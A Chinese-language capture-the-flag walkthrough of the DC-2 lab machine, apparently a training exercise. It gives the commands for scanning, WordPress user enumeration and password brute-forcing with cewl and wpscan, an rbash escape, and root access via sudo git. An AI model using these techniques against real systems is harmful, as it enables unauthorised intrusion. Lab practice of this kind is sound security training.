dc-2靶機-超詳解

dc-2內網靶

1、資訊收集

入站資訊

nmap掃描

nmap -A -p- -v 192.168.27.0/24

得到訊息：

IP：192.168.227.139
cms:wordpress 4.7.10
開放埠及服務：80(http)、7744(ssh)

頁面資訊

訪問ip發現跳轉，猜測可能是域名重定向

修改hosts檔案

重新訪問，訪問成功發現flag1

訪問成功發現flag1

標誌 1：

你通常的單詞列表可能不起作用，所以相反，也許你只需要 cewl。

密碼越多越好，但有時您無法全部贏得密碼。

以一個身份登入以檢視下一個標誌。

如果找不到它，請以其他人身份登入。

提示：用cewl(CeWL是一款以爬蟲模式在指定URL上收集單詞的工具，可以將它收集到的單詞納入密碼字典，以提高密碼破解工具的成功率。）

目錄爆破

dirb目錄掃描工具

dirb http://dc-2

dirsearch工具

dirsearch -u http://dc-2/ -x 404,403

訪問頁面

http://dc-2/wp-admin

2、滲透開始

cewl生成字典

cewl http://dc-2/ -w pa.txt

wpscan列舉爆破

使用者名稱獲取

WPScan是一個掃描 WordPress 漏洞的黑盒子掃描器，它可以為所有 Web 開發人員掃描 WordPress 漏洞並在他們開發前找到並解決問題。我們還使用了 Nikto ，它是一款非常棒的Web 伺服器評估工具，我們認為這個工具應該成為所有針對 WordPress網站進行的滲透測試的一部分

wpscan --url http://dc-2 -e u

得到三個使用者名稱

admin Jerry tom

爆破

burp爆破

wpscan爆破

wpscan --url http://dc-2 -U user.txt -P pa.txt

得到兩個使用者名稱和密碼

jerry adipiscing
tom	  parturient

登入

分別登入兩個賬號，jerry賬號下面發現flag2

提示為

如果你無法利用 WordPress 並走捷徑，還有另一種方法。
希望您找到另一個切入點。

提權

ssh連線

前面提示找另外一個切入點，不能在利用word press ，此時根據前面掃描發現ssh埠開啟此時連線ssh

ssh 

嘗試登入發現只有tom登入成功

檢視檔案

許可權限制

發現沒有許可權，並且有限制'-rbash'，可以明顯看出來是rbash逃逸

思路：1、根據一些漏洞穿越rbash，2、利用僅有的漏洞或者其他檢視一些檔案

此時檢視當前使用者可執行命令

echo $PATH 				//輸出路徑
echo /home/tom/usr/bin/*		//輸出可用命令

可以使用的命令有：less 、ls、scp、vi

/home/tom/usr/bin/less 
/home/tom/usr/bin/ls 
/home/tom/usr/bin/scp 
/home/tom/usr/bin/vi

利用vi 或者less得到到第三個flag

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
可憐的老湯姆總是追趕傑瑞。 也許他應該忍受他造成的所有壓力。

提示此時需要用su命令切換使用者，但是此時可以使用的命令只有上面幾個，那麼接下來就要提權，而這裡涉及的是切換使用者逃逸

su命令，只會更改當前使用者，而不會更改當前的使用者環境，比如你從kali使用者su到root賬戶中，當前路徑仍是你剛才的路徑，環境變數仍是kali使用者的
su- 命令，則在更改當前使用者資訊的同時還會更改使用者環境，但是假如你從kali 使用者su -到root賬戶，你會發現你的當前路徑已經變為/root/，環境變數也變了

rbash提權

詳細的建議去看看rbash逃逸

less繞過

scp -S /path/yourscript x y:

ls繞過

vi繞過

set shell=/bin/bash
shell
echo $PATH
export PATH='/user/bin:/bin'

更改變數繞過

BASH_CMDS[a]=/bin/sh;a      //使用並新增環境變數
export PATH=$PATH:/bin/     //將/bin 作為PATH環境變數匯出
export PATH=$PATH:/usr/bin  //將/usr/bin作為PATH環境變數匯出

切換使用者

發現flag4

Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

git提權

在flag4中表示還有一個flag，但是沒有提示，在最後有一個git，那麼此時應該是git提權

輸入
sudo git -p help
在最後面輸入:!/bin/bash
檢視flag:
root@DC-2:~# cat final-flag.txt 
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   

Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.

設及到的知識點：

Linux基本命令的使用

重定向

nmap掃描識別

目錄爆破（敏感目錄）

cewl的使用

wpscan的使用

ssh工具指定埠終端連線

rbash逃逸

git提權